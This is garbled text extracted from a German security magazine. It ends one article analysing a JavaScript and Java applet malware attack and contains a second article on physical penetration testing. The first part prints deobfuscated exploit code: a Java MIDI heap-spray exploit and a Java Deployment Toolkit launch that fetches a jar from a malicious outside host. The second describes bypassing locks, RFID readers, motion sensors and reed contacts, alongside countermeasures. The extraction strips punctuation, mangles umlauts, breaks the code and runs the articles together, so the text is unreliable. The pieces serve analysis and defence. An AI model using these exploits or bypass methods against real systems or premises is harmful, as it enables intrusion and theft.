Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
